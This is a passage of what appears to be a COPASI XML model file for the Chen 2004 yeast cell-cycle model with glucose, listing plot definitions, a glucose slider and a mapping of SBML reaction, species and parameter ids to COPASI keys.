</ListOfChannels>
</PlotItem>
<PlotItem name="Values[Vdpds]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vdpds],Reference=Value"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="Values[Vaiep]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vaiep],Reference=Value"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="Values[Vd2c1]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vd2c1],Reference=Value"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="Values[Vd2f6]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vd2f6],Reference=Value"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="Values[Vppc1]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vppc1],Reference=Value"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="Values[Vppf6]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vppf6],Reference=Value"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="Values[F]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[F],Reference=Value"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="Values[1stDivisionTime]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[1stDivisionTime],Reference=Value"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="Values[T0]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[T0],Reference=Value"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="Values[Period]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Period],Reference=Value"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="Values[GLUconsumed]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[GLUconsumed],Reference=Value"/>
</ListOfChannels>
</PlotItem>
</ListOfPlotItems>
</PlotSpecification>
</ListOfPlots>
<GUI>
<ListOfSliders>
<Slider key="Slider_0" associatedEntityKey="Task_15" objectCN="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[GLU],Reference=InitialConcentration" objectType="float" objectValue="0.002" minValue="0.0008" maxValue="2e+07" tickNumber="1000" tickFactor="100" scaling="linear"/>
</ListOfSliders>
</GUI>
<SBMLReference file="BIOMD0000000056.xml">
<SBMLMap SBMLid="Activation_of_CDC20" COPASIkey="Reaction_10"/>
<SBMLMap SBMLid="Activation_of_IEP" COPASIkey="Reaction_15"/>
<SBMLMap SBMLid="Activation_of_SWI5" COPASIkey="Reaction_17"/>
<SBMLMap SBMLid="Assoc_of_CLB2_and_SIC1" COPASIkey="Reaction_52"/>
<SBMLMap SBMLid="Assoc_of_CLB5_and_SIC1" COPASIkey="Reaction_50"/>
<SBMLMap SBMLid="Assoc_with_ESP1_to_form_PE" COPASIkey="Reaction_110"/>
<SBMLMap SBMLid="Assoc_with_NET1P_to_form_RENTP" COPASIkey="Reaction_88"/>
<SBMLMap SBMLid="Assoc_with_NET1_to_form_RENT" COPASIkey="Reaction_1"/>
<SBMLMap SBMLid="BCK2" COPASIkey="Metabolite_49"/>
<SBMLMap SBMLid="BUB2" COPASIkey="Metabolite_45"/>
<SBMLMap SBMLid="BUD" COPASIkey="Metabolite_41"/>
<SBMLMap SBMLid="Budding" COPASIkey="Reaction_114"/>
<SBMLMap SBMLid="C0" COPASIkey="ModelValue_12"/>
<SBMLMap SBMLid="C2" COPASIkey="Metabolite_37"/>
<SBMLMap SBMLid="C2P" COPASIkey="Metabolite_33"/>
<SBMLMap SBMLid="C5" COPASIkey="Metabolite_29"/>
<SBMLMap SBMLid="C5P" COPASIkey="Metabolite_25"/>
<SBMLMap SBMLid="CDC14" COPASIkey="Metabolite_21"/>
<SBMLMap SBMLid="CDC14T" COPASIkey="Metabolite_17"/>
<SBMLMap SBMLid="CDC14_degradation" COPASIkey="Reaction_2"/>
<SBMLMap SBMLid="CDC14_synthesis" COPASIkey="Reaction_3"/>
<SBMLMap SBMLid="CDC15" COPASIkey="Metabolite_13"/>
<SBMLMap SBMLid="CDC15T" COPASIkey="ModelValue_13"/>
<SBMLMap SBMLid="CDC15_activation" COPASIkey="Reaction_103"/>
<SBMLMap SBMLid="CDC15i" COPASIkey="Metabolite_9"/>
<SBMLMap SBMLid="CDC20" COPASIkey="Metabolite_5"/>
<SBMLMap SBMLid="CDC20i" COPASIkey="Metabolite_1"/>
<SBMLMap SBMLid="CDC6" COPASIkey="Metabolite_77"/>
<SBMLMap SBMLid="CDC6P" COPASIkey="Metabolite_79"/>
<SBMLMap SBMLid="CDC6T" COPASIkey="Metabolite_81"/>
<SBMLMap SBMLid="CDC6_degradation_in_F2P" COPASIkey="Reaction_24"/>
<SBMLMap SBMLid="CDC6_degradation_in_F5P" COPASIkey="Reaction_23"/>
<SBMLMap SBMLid="CDC6_synthesis" COPASIkey="Reaction_38"/>
<SBMLMap SBMLid="CDH1" COPASIkey="Metabolite_83"/>
<SBMLMap SBMLid="CDH1_degradation" COPASIkey="Reaction_7"/>
<SBMLMap SBMLid="CDH1_synthesis" COPASIkey="Reaction_8"/>
<SBMLMap SBMLid="CDH1i" COPASIkey="Metabolite_85"/>
<SBMLMap SBMLid="CDH1i_activation" COPASIkey="Reaction_5"/>
<SBMLMap SBMLid="CDH1i_degradation" COPASIkey="Reaction_6"/>
<SBMLMap SBMLid="CKIT" COPASIkey="Metabolite_87"/>
<SBMLMap SBMLid="CLB2" COPASIkey="Metabolite_89"/>
<SBMLMap SBMLid="CLB2CDC6_complex_formation" COPASIkey="Reaction_34"/>
<SBMLMap SBMLid="CLB2CDC6_dissociation" COPASIkey="Reaction_33"/>
<SBMLMap SBMLid="CLB2T" COPASIkey="Metabolite_91"/>
<SBMLMap SBMLid="CLB2_degradation_in_F2" COPASIkey="Reaction_26"/>
<SBMLMap SBMLid="CLB2_degradation_in_F2P" COPASIkey="Reaction_22"/>
<SBMLMap SBMLid="CLB5" COPASIkey="Metabolite_93"/>
<SBMLMap SBMLid="CLB5CDC6_complex_formation" COPASIkey="Reaction_32"/>
<SBMLMap SBMLid="CLB5CDC6_dissociation" COPASIkey="Reaction_31"/>
<SBMLMap SBMLid="CLB5T" COPASIkey="Metabolite_95"/>
<SBMLMap SBMLid="CLB5_degradation_in_F5" COPASIkey="Reaction_25"/>
<SBMLMap SBMLid="CLB5_degradation_in_F5P" COPASIkey="Reaction_21"/>
<SBMLMap SBMLid="CLN2" COPASIkey="Metabolite_97"/>
<SBMLMap SBMLid="CLN3" COPASIkey="Metabolite_99"/>
<SBMLMap SBMLid="D" COPASIkey="ModelValue_152"/>
<SBMLMap SBMLid="DNA_synthesis" COPASIkey="Reaction_112"/>
<SBMLMap SBMLid="Degradation_of_CDC14_in_RENT" COPASIkey="Reaction_99"/>
<SBMLMap SBMLid="Degradation_of_CDC14_in_RENTP" COPASIkey="Reaction_100"/>
<SBMLMap SBMLid="Degradation_of_CDC6P" COPASIkey="Reaction_35"/>
<SBMLMap SBMLid="Degradation_of_CLB2" COPASIkey="Reaction_59"/>
<SBMLMap SBMLid="Degradation_of_CLB2_in_C2" COPASIkey="Reaction_44"/>
<SBMLMap SBMLid="Degradation_of_CLB2_in_C2P" COPASIkey="Reaction_40"/>
<SBMLMap SBMLid="Degradation_of_CLB5" COPASIkey="Reaction_57"/>
<SBMLMap SBMLid="Degradation_of_CLB5_in_C5" COPASIkey="Reaction_43"/>
<SBMLMap SBMLid="Degradation_of_CLB5_in_C5P" COPASIkey="Reaction_39"/>
<SBMLMap SBMLid="Degradation_of_CLN2" COPASIkey="Reaction_61"/>
<SBMLMap SBMLid="Degradation_of_NET1P_in_RENTP" COPASIkey="Reaction_98"/>
<SBMLMap SBMLid="Degradation_of_NET1_in_RENT" COPASIkey="Reaction_97"/>
<SBMLMap SBMLid="Degradation_of_PDS1_in_PE" COPASIkey="Reaction_109"/>
<SBMLMap SBMLid="Degradation_of_SIC1P_in_C5P_" COPASIkey="Reaction_41"/>
<SBMLMap SBMLid="Degradation_of_SIC1_in_C2P" COPASIkey="Reaction_42"/>
<SBMLMap SBMLid="Degradation_of_SWI5" COPASIkey="Reaction_19"/>
<SBMLMap SBMLid="Degradation_of_SWI5P" COPASIkey="Reaction_18"/>
<SBMLMap SBMLid="Degradation_of_active_CDC20" COPASIkey="Reaction_11"/>
<SBMLMap SBMLid="Degradation_of_inactiveCDC20" COPASIkey="Reaction_12"/>
<SBMLMap SBMLid="Dephosphorylation_of_C2P" COPASIkey="Reaction_47"/>
<SBMLMap SBMLid="Dephosphorylation_of_C5P" COPASIkey="Reaction_45"/>
<SBMLMap SBMLid="Dephosphorylation_of_CDC6" COPASIkey="Reaction_36"/>
<SBMLMap SBMLid="Dephosphorylation_of_SIC1" COPASIkey="Reaction_54"/>
<SBMLMap SBMLid="Disso_from_PE" COPASIkey="Reaction_111"/>
<SBMLMap SBMLid="Dissoc_from_RENP" COPASIkey="Reaction_89"/>
<SBMLMap SBMLid="Dissoc_from_RENT" COPASIkey="Reaction_0"/>
<SBMLMap SBMLid="Dissoc_of_CLB2SIC1_complex" COPASIkey="Reaction_51"/>
<SBMLMap SBMLid="Dissoc_of_CLB5SIC1" COPASIkey="Reaction_49"/>
<SBMLMap SBMLid="Dn3" COPASIkey="ModelValue_14"/>
<SBMLMap SBMLid="ESP1" COPASIkey="Metabolite_101"/>
<SBMLMap SBMLid="ESP1T" COPASIkey="ModelValue_37"/>
<SBMLMap SBMLid="F" COPASIkey="ModelValue_171"/>
<SBMLMap SBMLid="F2" COPASIkey="Metabolite_103"/>
<SBMLMap SBMLid="F2P" COPASIkey="Metabolite_105"/>
<SBMLMap SBMLid="F2P_dephosphorylation" COPASIkey="Reaction_29"/>
<SBMLMap SBMLid="F2_phosphorylation" COPASIkey="Reaction_30"/>
<SBMLMap SBMLid="F5" COPASIkey="Metabolite_107"/>
<SBMLMap SBMLid="F5P" COPASIkey="Metabolite_109"/>
<SBMLMap SBMLid="F5P_dephosphorylation" COPASIkey="Reaction_27"/>
<SBMLMap SBMLid="F5_phosphorylation" COPASIkey="Reaction_28"/>
<SBMLMap SBMLid="Fast_Degradation_of_SIC1P" COPASIkey="Reaction_53"/>
<SBMLMap SBMLid="GK_219" COPASIkey="Function_44"/>
<SBMLMap SBMLid="Growth" COPASIkey="Reaction_63"/>
<SBMLMap SBMLid="IE" COPASIkey="Metabolite_111"/>
<SBMLMap SBMLid="IEP" COPASIkey="Metabolite_113"/>
<SBMLMap SBMLid="IET" COPASIkey="ModelValue_38"/>
<SBMLMap SBMLid="Inactivation_1" COPASIkey="Reaction_14"/>
<SBMLMap SBMLid="Inactivation_2" COPASIkey="Reaction_9"/>
<SBMLMap SBMLid="Inactivation_3" COPASIkey="Reaction_4"/>
<SBMLMap SBMLid="Inactivation_of_SWI5" COPASIkey="Reaction_16"/>
<SBMLMap SBMLid="J20ppx" COPASIkey="ModelValue_39"/>
<SBMLMap SBMLid="Jacdh" COPASIkey="ModelValue_40"/>
<SBMLMap SBMLid="Jaiep" COPASIkey="ModelValue_41"/>
<SBMLMap SBMLid="Jamcm" COPASIkey="ModelValue_42"/>
<SBMLMap SBMLid="Jasbf" COPASIkey="ModelValue_43"/>
<SBMLMap SBMLid="Jatem" COPASIkey="ModelValue_44"/>
<SBMLMap SBMLid="Jd2c1" COPASIkey="ModelValue_45"/>
<SBMLMap SBMLid="Jd2f6" COPASIkey="ModelValue_46"/>
<SBMLMap SBMLid="Jicdh" COPASIkey="ModelValue_47"/>
<SBMLMap SBMLid="Jiiep" COPASIkey="ModelValue_48"/>
<SBMLMap SBMLid="Jimcm" COPASIkey="ModelValue_49"/>
<SBMLMap SBMLid="Jisbf" COPASIkey="ModelValue_50"/>
<SBMLMap SBMLid="Jitem" COPASIkey="ModelValue_51"/>
<SBMLMap SBMLid="Jn3" COPASIkey="ModelValue_52"/>
<SBMLMap SBMLid="Jpds" COPASIkey="ModelValue_53"/>
<SBMLMap SBMLid="Jspn" COPASIkey="ModelValue_54"/>
<SBMLMap SBMLid="KEZ" COPASIkey="ModelValue_105"/>
<SBMLMap SBMLid="KEZ2" COPASIkey="ModelValue_106"/>
<SBMLMap SBMLid="LTE1" COPASIkey="Metabolite_115"/>
<SBMLMap SBMLid="MAD2" COPASIkey="Metabolite_117"/>
<SBMLMap SBMLid="MASS" COPASIkey="Metabolite_119"/>
<SBMLMap SBMLid="MCM1" COPASIkey="Metabolite_121"/>
<SBMLMap SBMLid="Mass_Action_1_222" COPASIkey="Function_45"/>
<SBMLMap SBMLid="Mass_Action_2_221" COPASIkey="Function_46"/>
<SBMLMap SBMLid="MichaelisMenten_220" COPASIkey="Function_47"/>
<SBMLMap SBMLid="NET1" COPASIkey="Metabolite_123"/>
<SBMLMap SBMLid="NET1P" COPASIkey="Metabolite_125"/>
<SBMLMap SBMLid="NET1T" COPASIkey="Metabolite_127"/>
<SBMLMap SBMLid="NET1_phosphorylation" COPASIkey="Reaction_93"/>
<SBMLMap SBMLid="Negative_regulation_of_Cell_budding" COPASIkey="Reaction_115"/>
<SBMLMap SBMLid="Negative_regulation_of_DNA_synthesis" COPASIkey="Reaction_113"/>
<SBMLMap SBMLid="Net1P_degradation" COPASIkey="Reaction_92"/>
<SBMLMap SBMLid="Net1_degradation" COPASIkey="Reaction_91"/>
<SBMLMap SBMLid="Net1_synthesis" COPASIkey="Reaction_90"/>
<SBMLMap SBMLid="ORI" COPASIkey="Metabolite_129"/>
<SBMLMap SBMLid="PDS1" COPASIkey="Metabolite_131"/>
<SBMLMap SBMLid="PDS1_synthesis" COPASIkey="Reaction_107"/>
<SBMLMap SBMLid="PE" COPASIkey="Metabolite_133"/>
<SBMLMap SBMLid="PPX" COPASIkey="Metabolite_135"/>
<SBMLMap SBMLid="PPX_synthesis" COPASIkey="Reaction_105"/>
<SBMLMap SBMLid="Phosphorylation_of_C2" COPASIkey="Reaction_48"/>
<SBMLMap SBMLid="Phosphorylation_of_C5" COPASIkey="Reaction_46"/>
<SBMLMap SBMLid="Phosphorylation_of_CDC6" COPASIkey="Reaction_37"/>
<SBMLMap SBMLid="Phosphorylation_of_SIC1" COPASIkey="Reaction_55"/>
<SBMLMap SBMLid="RENT" COPASIkey="Metabolite_137"/>
<SBMLMap SBMLid="RENTP" COPASIkey="Metabolite_139"/>
<SBMLMap SBMLid="RENT_phosphorylation" COPASIkey="Reaction_95"/>
<SBMLMap SBMLid="SBF" COPASIkey="Metabolite_141"/>
<SBMLMap SBMLid="SIC1" COPASIkey="Metabolite_143"/>
<SBMLMap SBMLid="SIC1P" COPASIkey="Metabolite_145"/>
<SBMLMap SBMLid="SIC1T" COPASIkey="Metabolite_147"/>
<SBMLMap SBMLid="SPN" COPASIkey="Metabolite_149"/>
<SBMLMap SBMLid="SWI5" COPASIkey="Metabolite_151"/>
<SBMLMap SBMLid="SWI5P" COPASIkey="Metabolite_153"/>
<SBMLMap SBMLid="Spindle_disassembly" COPASIkey="Reaction_117"/>
<SBMLMap SBMLid="Spindle_formation" COPASIkey="Reaction_116"/>
<SBMLMap SBMLid="Synthesis_of_CLB2" COPASIkey="Reaction_60"/>
<SBMLMap SBMLid="Synthesis_of_CLB5" COPASIkey="Reaction_58"/>
<SBMLMap SBMLid="Synthesis_of_CLN2" COPASIkey="Reaction_62"/>
<SBMLMap SBMLid="Synthesis_of_SIC1" COPASIkey="Reaction_56"/>
<SBMLMap SBMLid="Synthesis_of_SWI5" COPASIkey="Reaction_20"/>
<SBMLMap SBMLid="Synthesis_of_inactive_CDC20" COPASIkey="Reaction_13"/>
<SBMLMap SBMLid="TEM1GDP" COPASIkey="Metabolite_155"/>
<SBMLMap SBMLid="TEM1GTP" COPASIkey="Metabolite_157"/>
<SBMLMap SBMLid="TEM1T" COPASIkey="ModelValue_151"/>
<SBMLMap SBMLid="TEM1_activation" COPASIkey="Reaction_101"/>
<SBMLMap SBMLid="Vacdh" COPASIkey="ModelValue_160"/>
<SBMLMap SBMLid="Vaiep" COPASIkey="ModelValue_166"/>
<SBMLMap SBMLid="Vasbf" COPASIkey="ModelValue_156"/>
<SBMLMap SBMLid="Vd2c1" COPASIkey="ModelValue_167"/>
<SBMLMap SBMLid="Vd2f6" COPASIkey="ModelValue_168"/>
<SBMLMap SBMLid="Vdb2" COPASIkey="ModelValue_155"/>
<SBMLMap SBMLid="Vdb5" COPASIkey="ModelValue_154"/>
<SBMLMap SBMLid="Vdpds" COPASIkey="ModelValue_165"/>
<SBMLMap SBMLid="Vdppx" COPASIkey="ModelValue_164"/>
<SBMLMap SBMLid="Vicdh" COPASIkey="ModelValue_161"/>
<SBMLMap SBMLid="Visbf" COPASIkey="ModelValue_157"/>
<SBMLMap SBMLid="Vkpc1" COPASIkey="ModelValue_158"/>
<SBMLMap SBMLid="Vkpf6" COPASIkey="ModelValue_159"/>
<SBMLMap SBMLid="Vkpnet" COPASIkey="ModelValue_163"/>
<SBMLMap SBMLid="Vppc1" COPASIkey="ModelValue_169"/>
<SBMLMap SBMLid="Vppf6" COPASIkey="ModelValue_170"/>
<SBMLMap SBMLid="Vppnet" COPASIkey="ModelValue_162"/>
<SBMLMap SBMLid="b0" COPASIkey="ModelValue_6"/>
<SBMLMap SBMLid="bub2h" COPASIkey="ModelValue_5"/>
<SBMLMap SBMLid="bub2l" COPASIkey="ModelValue_11"/>
<SBMLMap SBMLid="cell" COPASIkey="Compartment_3"/>
<SBMLMap SBMLid="degradation_1" COPASIkey="Reaction_106"/>
<SBMLMap SBMLid="degradation_2" COPASIkey="Reaction_108"/>
<SBMLMap SBMLid="dephosphorylation_1" COPASIkey="Reaction_94"/>
<SBMLMap SBMLid="dephosphorylation_2" COPASIkey="Reaction_96"/>
<SBMLMap SBMLid="ebudb5" COPASIkey="ModelValue_15"/>
<SBMLMap SBMLid="ebudn2" COPASIkey="ModelValue_16"/>
<SBMLMap SBMLid="ebudn3" COPASIkey="ModelValue_17"/>
<SBMLMap SBMLid="ec1b2" COPASIkey="ModelValue_18"/>
<SBMLMap SBMLid="ec1b5" COPASIkey="ModelValue_19"/>
<SBMLMap SBMLid="ec1k2" COPASIkey="ModelValue_20"/>
<SBMLMap SBMLid="ec1n2" COPASIkey="ModelValue_21"/>
<SBMLMap SBMLid="ec1n3" COPASIkey="ModelValue_22"/>
<SBMLMap SBMLid="ef6b2" COPASIkey="ModelValue_23"/>
<SBMLMap SBMLid="ef6b5" COPASIkey="ModelValue_24"/>
<SBMLMap SBMLid="ef6k2" COPASIkey="ModelValue_25"/>
<SBMLMap SBMLid="ef6n2" COPASIkey="ModelValue_26"/>
<SBMLMap SBMLid="ef6n3" COPASIkey="ModelValue_27"/>
<SBMLMap SBMLid="eicdhb2" COPASIkey="ModelValue_28"/>
<SBMLMap SBMLid="eicdhb5" COPASIkey="ModelValue_29"/>
<SBMLMap SBMLid="eicdhn2" COPASIkey="ModelValue_30"/>
<SBMLMap SBMLid="eicdhn3" COPASIkey="ModelValue_31"/>
<SBMLMap SBMLid="eorib2" COPASIkey="ModelValue_32"/>
<SBMLMap SBMLid="eorib5" COPASIkey="ModelValue_33"/>
<SBMLMap SBMLid="esbfb5" COPASIkey="ModelValue_34"/>
<SBMLMap SBMLid="esbfn2" COPASIkey="ModelValue_35"/>
<SBMLMap SBMLid="esbfn3" COPASIkey="ModelValue_36"/>
<SBMLMap SBMLid="inactivation_1" COPASIkey="Reaction_102"/>
<SBMLMap SBMLid="inactivation_2" COPASIkey="Reaction_104"/>
<SBMLMap SBMLid="ka15_p" COPASIkey="ModelValue_55"/>
<SBMLMap SBMLid="ka15_p_p" COPASIkey="ModelValue_56"/>
<SBMLMap SBMLid="ka15p" COPASIkey="ModelValue_57"/>
<SBMLMap SBMLid="ka20_p" COPASIkey="ModelValue_58"/>
<SBMLMap SBMLid="ka20_p_p" COPASIkey="ModelValue_59"/>
<SBMLMap SBMLid="kacdh_p" COPASIkey="ModelValue_60"/>
<SBMLMap SBMLid="kacdh_p_p" COPASIkey="ModelValue_61"/>
<SBMLMap SBMLid="kaiep" COPASIkey="ModelValue_62"/>
<SBMLMap SBMLid="kamcm" COPASIkey="ModelValue_63"/>
<SBMLMap SBMLid="kasb2" COPASIkey="ModelValue_64"/>
<SBMLMap SBMLid="kasb5" COPASIkey="ModelValue_65"/>
<SBMLMap SBMLid="kasbf" COPASIkey="ModelValue_66"/>
<SBMLMap SBMLid="kasesp" COPASIkey="ModelValue_67"/>
<SBMLMap SBMLid="kasf2" COPASIkey="ModelValue_68"/>
<SBMLMap SBMLid="kasf5" COPASIkey="ModelValue_69"/>
<SBMLMap SBMLid="kasrent" COPASIkey="ModelValue_70"/>
<SBMLMap SBMLid="kasrentp" COPASIkey="ModelValue_71"/>
<SBMLMap SBMLid="kaswi" COPASIkey="ModelValue_72"/>
<SBMLMap SBMLid="kd14" COPASIkey="ModelValue_73"/>
<SBMLMap SBMLid="kd1c1" COPASIkey="ModelValue_74"/>
<SBMLMap SBMLid="kd1f6" COPASIkey="ModelValue_75"/>
<SBMLMap SBMLid="kd1pds_p" COPASIkey="ModelValue_76"/>
<SBMLMap SBMLid="kd20" COPASIkey="ModelValue_77"/>
<SBMLMap SBMLid="kd2c1" COPASIkey="ModelValue_78"/>
<SBMLMap SBMLid="kd2f6" COPASIkey="ModelValue_79"/>
<SBMLMap SBMLid="kd2pds_p_p" COPASIkey="ModelValue_80"/>
<SBMLMap SBMLid="kd3c1" COPASIkey="ModelValue_81"/>
<SBMLMap SBMLid="kd3f6" COPASIkey="ModelValue_82"/>
<SBMLMap SBMLid="kd3pds_p_p" COPASIkey="ModelValue_83"/>
<SBMLMap SBMLid="kdb2_p" COPASIkey="ModelValue_84"/>
<SBMLMap SBMLid="kdb2_p_p" COPASIkey="ModelValue_85"/>
<SBMLMap SBMLid="kdb2p" COPASIkey="ModelValue_86"/>
<SBMLMap SBMLid="kdb5_p" COPASIkey="ModelValue_87"/>
<SBMLMap SBMLid="kdb5_p_p" COPASIkey="ModelValue_88"/>
<SBMLMap SBMLid="kdbud" COPASIkey="ModelValue_89"/>
<SBMLMap SBMLid="kdcdh" COPASIkey="ModelValue_90"/>
<SBMLMap SBMLid="kdib2" COPASIkey="ModelValue_91"/>
<SBMLMap SBMLid="kdib5" COPASIkey="ModelValue_92"/>
<SBMLMap SBMLid="kdiesp" COPASIkey="ModelValue_93"/>
<SBMLMap SBMLid="kdif2" COPASIkey="ModelValue_94"/>
<SBMLMap SBMLid="kdif5" COPASIkey="ModelValue_95"/>
<SBMLMap SBMLid="kdirent" COPASIkey="ModelValue_96"/>
<SBMLMap SBMLid="kdirentp" COPASIkey="ModelValue_97"/>
<SBMLMap SBMLid="kdn2" COPASIkey="ModelValue_98"/>
<SBMLMap SBMLid="kdnet" COPASIkey="ModelValue_99"/>
<SBMLMap SBMLid="kdori" COPASIkey="ModelValue_100"/>
<SBMLMap SBMLid="kdppx_p" COPASIkey="ModelValue_101"/>
<SBMLMap SBMLid="kdppx_p_p" COPASIkey="ModelValue_102"/>
<SBMLMap SBMLid="kdspn" COPASIkey="ModelValue_103"/>
<SBMLMap SBMLid="kdswi" COPASIkey="ModelValue_104"/>
<SBMLMap SBMLid="ki15" COPASIkey="ModelValue_107"/>
<SBMLMap SBMLid="kicdh_p" COPASIkey="ModelValue_108"/>
<SBMLMap SBMLid="kicdh_p_p" COPASIkey="ModelValue_109"/>
<SBMLMap SBMLid="kiiep" COPASIkey="ModelValue_110"/>
<SBMLMap SBMLid="kimcm" COPASIkey="ModelValue_111"/>
<SBMLMap SBMLid="kisbf_p" COPASIkey="ModelValue_112"/>
<SBMLMap SBMLid="kisbf_p_p" COPASIkey="ModelValue_113"/>
<SBMLMap SBMLid="kiswi" COPASIkey="ModelValue_114"/>
<SBMLMap SBMLid="kkpnet_p" COPASIkey="ModelValue_115"/>
<SBMLMap SBMLid="kkpnet_p_p" COPASIkey="ModelValue_116"/>
<SBMLMap SBMLid="kppc1" COPASIkey="ModelValue_117"/>
<SBMLMap SBMLid="kppf6" COPASIkey="ModelValue_118"/>
<SBMLMap SBMLid="kppnet_p" COPASIkey="ModelValue_119"/>
<SBMLMap SBMLid="kppnet_p_p" COPASIkey="ModelValue_120"/>
<SBMLMap SBMLid="ks14" COPASIkey="ModelValue_121"/>
